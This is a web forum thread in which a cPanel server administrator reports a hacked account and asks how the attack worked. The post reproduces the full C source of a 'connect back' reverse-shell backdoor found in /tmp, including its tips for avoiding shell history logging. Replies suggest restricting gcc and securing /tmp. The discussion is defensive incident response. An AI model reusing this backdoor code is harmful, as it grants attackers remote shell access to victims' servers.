Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

One account hacked through /tmp

Discussion in 'General Discussion' started by elleryjh, Jan 31, 2004.

  1. elleryjh

    elleryjh Well-Known Member

    Apr 12, 2003
    Likes Received:
    Trophy Points:
    One account on a new, up-to-date server was hacked. The account doesn't have shell access. The site's index page was changed, with no other visible. The user is not likely to have done the exploit.

    phpsuexec, suexec and php_basedir are all enabled.

    No FTP activty for that account was listed in /var/log/messages.

    No processes are running by that user.

    Does anybody know how this attack was carried out, and where to look for more evidence?

    /tmp is mounted as noexec, and
    root@server [/tmp]# /scripts/securetmp
    /tmp is already secure
    /var/tmp is already secure
    Process Complete

    However, looks like this file was compiled and run... This file and it's binary was in /tmp, owned by that user:
    root@server [/tmp]# more dc-connectback.c
    #include <stdio.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    int main(int argc, char **argv) {
    char *host;
    int port = 80;
    int f;
    int l;
    int sock;
    struct in_addr ia;
    struct sockaddr_in sin, from;
    struct hostent *he;
    char msg[ ] = "Welcome to Data Cha0s Connect Back Shell\n\n"
    "Issue \"export TERM=xterm; exec bash -i\"\n"
    "For More Reliable Shell.\n"
    "Issue \"unset HISTFILE; unset SAVEHIST\"\n"
    "For Not Getting Logged.\n(;\n\n";
    printf("Data Cha0s Connect Back Backdoor\n\n");
    if (argc < 2 || argc > 3) {
    printf("Usage: %s [Host] <port>\n", argv[0]);
    return 1;
    printf("[*] Dumping Arguments\n");
    l = strlen(argv[1]);
    if (l <= 0) {
    printf("[-] Invalid Host Name\n");
    return 1;
    if (!(host = (char *) malloc(l))) {
    printf("[-] Unable to Allocate Memory\n");
    return 1;
    strncpy(host, argv[1], l);
    if (argc == 3) {
    port = atoi(argv[2]);
    if (port <= 0 || port > 65535) {
    printf("[-] Invalid Port Number\n");
    return 1;
    printf("[*] Resolving Host Name\n");
    he = gethostbyname(host);
    if (he) {
    memcpy(&ia.s_addr, he->h_addr, 4);
    } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
    printf("[-] Unable to Resolve: %s\n", host);
    return 1;
    sin.sin_family = PF_INET;
    sin.sin_addr.s_addr = ia.s_addr;
    sin.sin_port = htons(port);
    printf("[*] Connecting...\n");
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
    printf("[-] Socket Error\n");
    return 1;
    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
    printf("[-] Unable to Connect\n");
    return 1;
    printf("[*] Spawning Shell\n");
    f = fork( );
    if (f < 0) {
    printf("[-] Unable to Fork\n");
    return 1;
    } else if (!f) {
    write(sock, msg, sizeof(msg));
    dup2(sock, 0);
    dup2(sock, 1);
    dup2(sock, 2);
    execl("/bin/sh", "shell", NULL);
    return 0;
    printf("[*] Detached\n\n");
    return 0;
  2. Stenny Chong

    Stenny Chong Well-Known Member

    Jun 12, 2002
    Likes Received:
    Trophy Points:
    I suggest you do the following to secure or disallow other user compiling program.

    chmod 700 /usr/bin/gcc.
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. kris1351

    kris1351 Well-Known Member

    Apr 18, 2003
    Likes Received:
    Trophy Points:
    Lewisville, Tx
    Definately need to run /scripts/securetmp

    This will make it so no compiling or executions can happen in tmp. Like Stenny said also make gcc non-executable. You can change it when you need to compile very easily.
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice